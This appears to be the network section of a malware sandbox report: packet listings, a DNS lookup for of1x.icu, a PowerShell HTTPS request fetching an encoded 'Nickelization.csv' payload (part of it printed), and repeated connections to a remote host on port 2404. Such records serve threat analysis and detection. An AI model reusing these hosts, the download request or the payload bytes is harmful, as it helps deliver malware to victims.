                                          Dec 12, 2024 07:54:53.381683111 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.381817102 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.388112068 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.388178110 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.394695044 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.394803047 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.399643898 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.399825096 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.406354904 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.406488895 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.409698963 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.409852028 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.416311979 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.416412115 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.422692060 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.422796965 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.426218033 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.426281929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.527374983 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.527564049 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.530308962 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.530415058 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.536111116 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.536216021 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.541344881 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.541462898 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.544231892 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.544358015 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.549300909 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.549432993 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.554433107 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.554579973 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.557054043 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.557218075 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.562035084 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.562191963 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.566905975 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.567069054 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.571933985 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.572073936 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.574573994 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.574754000 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.579593897 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.579705954 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.582129002 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.582201958 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.599759102 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599770069 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599801064 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599845886 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.599858046 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.599977016 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.615984917 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.616003036 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.616097927 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.616106033 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.616230965 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.633575916 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.633595943 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.633774996 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.633784056 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.634119034 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.650907993 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.650926113 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.651159048 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.651170015 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.651293039 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.725198030 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.725217104 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.725311041 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.725327015 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.725388050 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.738360882 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.738377094 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.738447905 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.738462925 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.738579988 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.750683069 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.750700951 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.750839949 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.750849009 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.751025915 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.760791063 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.760809898 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.760983944 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.761003017 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.761132002 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.772567987 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.772583008 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.772680998 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.772689104 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.773027897 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.775861025 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.775958061 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.775964975 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.776021004 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.782073021 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.782088041 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.782202005 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.782208920 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.782257080 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.787575960 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.787590027 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.787715912 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.787722111 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.787770987 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.910936117 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.910959005 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.911055088 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.911063910 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.911262035 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.916637897 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.916651964 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.916775942 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.916784048 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.916904926 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.922125101 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.922138929 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.922275066 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.922281981 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.923069000 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.928318024 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.928330898 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.928458929 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.928466082 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.930996895 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.931057930 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.931062937 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.931106091 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.931106091 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.936145067 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.936214924 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.936244965 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.936249018 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:53.936377048 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.938196898 CET49776443192.168.2.7172.67.216.143
                                          Dec 12, 2024 07:54:53.938215017 CET44349776172.67.216.143192.168.2.7
                                          Dec 12, 2024 07:54:55.377141953 CET497862404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:54:55.496479034 CET240449786154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:54:55.496602058 CET497862404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:54:55.500344038 CET497862404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:54:55.619641066 CET240449786154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:17.429605961 CET240449786154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:17.429699898 CET497862404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:17.429780006 CET497862404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:17.549339056 CET240449786154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:18.441293955 CET498412404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:18.560630083 CET240449841154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:18.560837030 CET498412404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:18.565927029 CET498412404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:18.685297012 CET240449841154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:40.476829052 CET240449841154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:40.476958036 CET498412404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:40.477103949 CET498412404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:40.596323967 CET240449841154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:41.488226891 CET498942404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:41.607728004 CET240449894154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:55:41.608026981 CET498942404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:41.611166000 CET498942404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:55:41.730675936 CET240449894154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:56:03.524431944 CET240449894154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:56:03.524506092 CET498942404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:56:03.524589062 CET498942404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:56:03.658327103 CET240449894154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:56:04.535070896 CET499462404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:56:04.654534101 CET240449946154.216.18.216192.168.2.7
                                          Dec 12, 2024 07:56:04.655386925 CET499462404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:56:04.658328056 CET499462404192.168.2.7154.216.18.216
                                          Dec 12, 2024 07:56:04.777766943 CET240449946154.216.18.216192.168.2.7

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 12, 2024 07:54:09.270737886 CET5376053192.168.2.71.1.1.1
                                          Dec 12, 2024 07:54:09.667146921 CET53537601.1.1.1192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 12, 2024 07:54:09.270737886 CET192.168.2.71.1.1.10x1b41Standard query (0)of1x.icuA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 12, 2024 07:54:09.667146921 CET1.1.1.1192.168.2.70x1b41No error (0)of1x.icu172.67.216.143A (IP address)IN (0x0001)false
                                          Dec 12, 2024 07:54:09.667146921 CET1.1.1.1192.168.2.70x1b41No error (0)of1x.icu104.21.86.72A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • of1x.icu

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749699172.67.216.1434432356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-12 06:54:10 UTC178OUTGET /rxHEjEYE/Nickelization.csv HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: of1x.icu
                                          Connection: Keep-Alive
                                          2024-12-12 06:54:11 UTC836INHTTP/1.1 200 OK
                                          Date: Thu, 12 Dec 2024 06:54:11 GMT
                                          Content-Type: text/csv
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: max-age=14400
                                          CF-Cache-Status: MISS
                                          Last-Modified: Thu, 12 Dec 2024 06:54:11 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYd942qCYKMa6r28cGA0i6MZnIsEddj0fBbU7y4Lo6Uy7eIbUtEKj%2BxYQ4O5vNdc8OL9TIJlPQ8lKKWODfPrLcDvVlX9IxgA7QDrbtP3bGDKmfdrBoDgJXY3kQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8f0bcd37dad3c3ee-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1610&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=792&delivery_rate=1813664&cwnd=247&unsent_bytes=0&cid=1fffcf3afcbbc48e&ts=677&x=0"
                                          2024-12-12 06:54:11 UTC533INData Raw: 33 38 65 38 0d 0a 36 77 4b 74 71 48 45 42 6d 37 75 76 35 52 63 41 36 77 49 6c 6f 48 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 72 38 45 75 56 74 46 56 73 70 78 41 5a 74 78 41 5a 75 42 77 64 4d 73 79 42 44 72 41 76 4a 37 63 51 47 62 67 66 45 75 63 68 37 62 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4b 62 68 4c 72 66 55 50 72 71 36 77 49 6d 53 4f 73 43 62 78 31 78 41 5a 74 78 41 5a 73 78 79 75 73 43 34 37 6c 78 41 5a 75 4a 46 41 74 78 41 5a 76 72 41 73 78 49 30 65 4a 78 41 5a 76 72 41 72 74 79 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6b 52 54 61 77 43 66 4d 31 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 36 77 4a 48 36 33 45 42 6d 34 6e 44 63 51 47 62 36 77 4b 61 6d 34 48 44 51 51 39 4a 41 48 45 42 6d 33 45 42 6d 37 72 75 34 39 76 5a 63 51 47 62 63 51 47 62 67
                                          Data Ascii: 38e86wKtqHEBm7uv5RcA6wIloHEBmwNcJARxAZvrAr8EuVtFVspxAZtxAZuBwdMsyBDrAvJ7cQGbgfEuch7bcQGbcQGbcQGb6wKbhLrfUPrq6wImSOsCbx1xAZtxAZsxyusC47lxAZuJFAtxAZvrAsxI0eJxAZvrArtyg8EEcQGbcQGbgfkRTawCfM1xAZtxAZuLRCQE6wJH63EBm4nDcQGb6wKam4HDQQ9JAHEBm3EBm7ru49vZcQGbcQGbg
                                          2024-12-12 06:54:11 UTC1369INData Raw: 42 6d 34 6e 72 63 51 47 62 36 77 49 41 39 59 6d 37 42 41 45 41 41 48 45 42 6d 2b 73 43 65 68 53 42 77 77 51 42 41 41 42 78 41 5a 74 78 41 5a 74 54 63 51 47 62 63 51 47 62 61 76 39 78 41 5a 74 78 41 5a 75 44 77 67 58 72 41 76 72 75 36 77 49 36 4b 7a 48 32 63 51 47 62 36 77 4b 65 42 44 48 4a 36 77 4a 31 37 4f 73 43 54 76 4f 4c 47 75 73 43 53 57 4c 72 41 72 53 71 51 65 73 43 70 73 66 72 41 75 62 38 4f 52 77 4b 64 66 4a 78 41 5a 76 72 41 6d 66 65 52 75 73 43 44 49 62 72 41 6a 74 4c 67 48 77 4b 2b 37 68 31 32 33 45 42 6d 33 45 42 6d 34 74 45 43 76 7a 72 41 67 76 4c 36 77 4b 55 5a 69 6e 77 36 77 4b 32 42 65 73 43 54 37 48 2f 30 6e 45 42 6d 33 45 42 6d 37 71 59 2f 41 51 41 63 51 47 62 36 77 49 55 65 54 48 41 63 51 47 62 63 51 47 62 69 33 77 6b 44 48 45 42 6d 2b
                                          Data Ascii: Bm4nrcQGb6wIA9Ym7BAEAAHEBm+sCehSBwwQBAABxAZtxAZtTcQGbcQGbav9xAZtxAZuDwgXrAvru6wI6KzH2cQGb6wKeBDHJ6wJ17OsCTvOLGusCSWLrArSqQesCpsfrAub8ORwKdfJxAZvrAmfeRusCDIbrAjtLgHwK+7h123EBm3EBm4tECvzrAgvL6wKUZinw6wK2BesCT7H/0nEBm3EBm7qY/AQAcQGb6wIUeTHAcQGbcQGbi3wkDHEBm+
                                          2024-12-12 06:54:11 UTC1369INData Raw: 58 6a 58 61 48 47 77 47 54 4a 31 4c 58 4f 4f 4a 4c 59 2b 76 4f 63 45 77 49 62 57 67 53 47 70 77 6f 37 69 4b 41 77 6a 74 71 33 54 53 64 63 43 59 47 44 33 44 54 43 6d 4e 43 51 32 43 71 55 75 55 6b 43 56 61 6a 38 74 37 4f 73 64 61 47 2f 2f 44 44 4d 34 47 63 69 6d 71 5a 4f 44 7a 62 42 4e 4b 49 78 6a 49 47 36 6c 50 35 52 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 43 4c 63 69 4c 73 32 79 5a 32 39 4d 49 48 77 75 4f 70 38 64 6d 52 67 53 61 79 31 50 6f 53 69 4c 35 35 68 37 31 57 70 61 78 56 57 5a 45 77 56 64 41 55 49 64 44 49 46 71 68 56 68 36 76 6f 52 61 76 55 4b 61 4c 48 35 2f 55 6e 55 65 50 75 71 6d 63 67 4b 61 4b 6b 78 39 35 62 55 65 50 4e 6d 7a 65 63 2f 73 6c 5a 38 71 46 72 54 5a 42 68 4c 63 6a
                                          Data Ascii: XjXaHGwGTJ1LXOOJLY+vOcEwIbWgSGpwo7iKAwjtq3TSdcCYGD3DTCmNCQ2CqUuUkCVaj8t7OsdaG//DDM4GcimqZODzbBNKIxjIG6lP5RSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0BSoVdCLciLs2yZ29MIHwuOp8dmRgSay1PoSiL55h71WpaxVWZEwVdAUIdDIFqhVh6voRavUKaLH5/UnUePuqmcgKaKkx95bUePNmzec/slZ8qFrTZBhLcj
                                          2024-12-12 06:54:11 UTC1369INData Raw: 35 56 66 39 65 4c 6d 6c 39 51 6e 6e 7a 49 46 6b 35 32 76 32 48 5a 67 44 36 49 2b 4d 2f 54 4a 42 33 5a 36 4f 57 62 6e 4c 4f 72 69 32 6f 44 45 70 4c 71 78 4b 56 35 36 74 5a 71 6a 6b 2b 52 4a 6f 6b 37 47 51 7a 66 45 65 76 34 38 4c 2f 65 5a 36 33 43 53 47 4d 44 6b 4d 56 36 66 4e 71 6e 65 36 53 6b 4d 5a 39 4f 6a 44 37 76 4c 51 68 77 71 50 31 67 35 56 67 79 4e 72 74 47 73 64 63 55 4d 56 37 31 66 32 37 46 45 51 68 49 63 6e 53 58 68 30 52 53 6f 37 41 52 67 4c 62 68 52 35 56 41 4c 66 36 6b 70 6c 42 4b 2f 61 2f 52 52 35 55 62 51 50 65 56 6b 68 4f 7a 33 46 37 4f 4b 71 63 78 39 44 5a 54 77 68 57 36 4c 33 69 4a 43 38 5a 2f 62 76 30 45 34 43 59 2b 44 53 59 2b 76 53 6a 46 6f 63 43 35 4c 76 75 34 30 6d 77 68 6c 52 51 67 6c 59 6b 62 73 63 4c 45 62 71 55 50 4f 46 4b 68 56
                                          Data Ascii: 5Vf9eLml9QnnzIFk52v2HZgD6I+M/TJB3Z6OWbnLOri2oDEpLqxKV56tZqjk+RJok7GQzfEev48L/eZ63CSGMDkMV6fNqne6SkMZ9OjD7vLQhwqP1g5VgyNrtGsdcUMV71f27FEQhIcnSXh0RSo7ARgLbhR5VALf6kplBK/a/RR5UbQPeVkhOz3F7OKqcx9DZTwhW6L3iJC8Z/bv0E4CY+DSY+vSjFocC5Lvu40mwhlRQglYkbscLEbqUPOFKhV
                                          2024-12-12 06:54:11 UTC1369INData Raw: 7a 43 6c 7a 4e 35 74 73 46 71 47 76 4a 2b 41 6e 4c 43 78 69 71 5a 7a 2f 35 71 2f 65 64 39 77 66 45 59 41 50 30 32 31 7a 36 65 32 48 65 2f 54 50 49 43 50 66 49 44 48 50 79 38 4c 4f 6e 6a 46 62 54 44 78 53 34 4f 5a 6f 58 62 6e 37 39 70 2b 6a 46 42 56 55 64 50 30 53 53 64 65 79 38 2b 46 65 39 58 4c 6d 50 6a 36 69 44 37 69 53 39 6d 33 72 33 68 6e 78 32 54 30 52 53 6f 41 32 34 38 55 76 69 70 6c 56 34 30 52 30 30 78 31 42 59 50 51 31 37 50 6e 61 34 35 34 56 55 6e 75 4a 47 4e 67 38 68 36 6f 46 4f 38 76 2f 6d 78 50 36 73 6c 71 66 69 57 4c 33 5a 49 73 2f 56 4d 4d 45 6d 5a 43 71 39 42 4c 74 65 58 6a 6b 59 53 76 6f 47 50 6a 74 51 69 52 35 4f 2f 76 4a 56 71 2b 78 75 61 48 64 7a 69 7a 6b 6a 6b 4c 32 2f 4d 47 47 32 64 51 58 50 35 6f 59 54 56 4e 47 4a 75 4f 39 6c 6d 6a
                                          Data Ascii: zClzN5tsFqGvJ+AnLCxiqZz/5q/ed9wfEYAP021z6e2He/TPICPfIDHPy8LOnjFbTDxS4OZoXbn79p+jFBVUdP0SSdey8+Fe9XLmPj6iD7iS9m3r3hnx2T0RSoA248UviplV40R00x1BYPQ17Pna454VUnuJGNg8h6oFO8v/mxP6slqfiWL3ZIs/VMMEmZCq9BLteXjkYSvoGPjtQiR5O/vJVq+xuaHdzizkjkL2/MGG2dQXP5oYTVNGJuO9lmj
                                          2024-12-12 06:54:11 UTC1369INData Raw: 72 34 61 48 79 70 31 54 50 76 61 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 51 75 4e 55 4b 43 42 31 62 61 62 70 38 5a 65 2b 66 41 35 63 69 74 41 74 78 4e 68 71 6c 56 30 4b 38 66 79 58 4c 61 2b 2b 34 5a 69 70 6c 74 55 65 66 42 69 53 4a 6f 4b 61 59 42 36 46 73 36 55 65 66 5a 36 75 41 2f 2f 38 6c 5a 38 36 46 4b 54 5a 42 34 4c 2f 65 74 41 5a 66 62 63 55 77 2b 45 78 47 6a 4c 37 42 68 36 73 6b 59 6e 33 76 77 38 30 4c 49 69 6a 43 39 49 42 7a 66 44 37 37 4f 64 75 75 64 4d 30 57 76 5a 30 45 62 6e 4e 5a 4e 6b 33 2f 57 45 58 67 4f 39 32 30 74 54 79 6d 2b 4a 61 34 34 58 56 48 58 6e 4e 67 36 37 43 6d 2b 4d 58 70 55 36 34 65 72 57 57 6e 68 79 53 6d 69 39 73 31 72 33 56 48 6a 4b 67 30 69 51 53 46 71 33 6a
                                          Data Ascii: r4aHyp1TPvahV0BSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0BQuNUKCB1babp8Ze+fA5citAtxNhqlV0K8fyXLa++4ZipltUefBiSJoKaYB6Fs6UefZ6uA//8lZ86FKTZB4L/etAZfbcUw+ExGjL7Bh6skYn3vw80LIijC9IBzfD77OduudM0WvZ0EbnNZNk3/WEXgO920tTym+Ja44XVHXnNg67Cm+MXpU64erWWnhySmi9s1r3VHjKg0iQSFq3j
                                          2024-12-12 06:54:11 UTC1369INData Raw: 46 4b 68 56 30 42 53 6f 56 64 41 55 4b 70 70 4f 6c 30 77 43 43 43 4d 70 34 4b 34 57 71 46 57 77 69 46 50 6a 55 5a 48 57 56 39 41 55 72 66 4c 67 5a 66 37 72 74 67 6d 5a 33 31 48 36 53 4e 6f 33 70 69 6d 54 4b 34 57 50 74 46 48 69 4b 55 75 68 72 50 72 4a 57 66 61 70 5a 30 30 74 63 53 54 48 67 51 54 66 48 2b 53 6a 67 66 77 30 49 43 53 49 62 6b 36 45 6a 72 73 36 78 74 38 64 36 6b 4b 63 4c 4e 76 58 38 45 75 74 32 32 6b 6b 34 6a 4e 52 36 2f 37 39 69 70 46 69 43 2b 75 68 31 6c 66 51 46 4e 30 41 68 71 6f 2f 70 78 78 49 4b 5a 50 39 73 38 2f 4d 55 66 70 73 7a 65 54 69 2f 38 6c 5a 38 36 46 69 54 5a 46 6e 4a 63 30 4b 69 73 68 74 30 4c 72 71 4b 7a 68 62 47 67 6f 6e 61 6e 6c 34 4f 78 4c 31 61 69 2b 77 6b 2f 48 51 68 5a 4e 59 56 66 6a 51 74 4a 2b 50 66 61 73 2f 69 5a 36
                                          Data Ascii: FKhV0BSoVdAUKppOl0wCCCMp4K4WqFWwiFPjUZHWV9AUrfLgZf7rtgmZ31H6SNo3pimTK4WPtFHiKUuhrPrJWfapZ00tcSTHgQTfH+Sjgfw0ICSIbk6Ejrs6xt8d6kKcLNvX8Eut22kk4jNR6/79ipFiC+uh1lfQFN0Ahqo/pxxIKZP9s8/MUfpszeTi/8lZ86FiTZFnJc0Kisht0LrqKzhbGgonanl4OxL1ai+wk/HQhZNYVfjQtJ+Pfas/iZ6
